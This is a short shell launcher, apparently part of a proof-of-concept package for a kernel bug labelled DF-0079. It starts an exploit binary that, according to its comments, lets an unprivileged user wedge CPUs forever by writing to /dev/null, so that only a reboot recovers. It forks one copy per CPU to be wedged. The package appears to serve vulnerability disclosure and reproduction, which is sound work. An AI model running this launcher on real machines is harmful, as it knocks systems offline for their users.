DF-0079 / run.sh
#!/bin/sh # DF-0079 run script. Demonstrates the infinite-loop DoS. # # Run as an UNPRIVILEGED user (maxx, uid 1001). /dev/null is mode 0666 so no # privilege is required. The single write() below will NEVER return on a # vulnerable kernel: it pegs one CPU at 100% in kernel (mmrw) forever and the # process cannot be killed (only a reboot recovers). Each additional copy # wedges another core. # # WARNING: this is a full-system local DoS. On a small guest it can make the # machine unresponsive to ssh within ~1 second. Run in a disposable VM and # hard-reset afterwards. # # Usage: # ./run.sh # wedge 1 CPU forever # ./run.sh 4 # fork 4 copies to wedge 4 CPUs # # To observe the wedged thread before it starves the box, run (as root, from # another session, immediately) something like: # while true; do pgrep -n df0079 | xargs -r ps -o pid,stat,pcpu,cputime,args -p; sleep 0.2; done # (or use the serial-console watcher watch_df0079.sh so output survives a reset). cd "$(dirname "$0")" N=${1:-1} echo "DF-0079: launching $N wedge process(es) as uid=$(id -u) on /dev/null" if [ "$N" -le 1 ]; then ./df0079 # never returns on a vulnerable kernel else ./df0079 "$N" fi |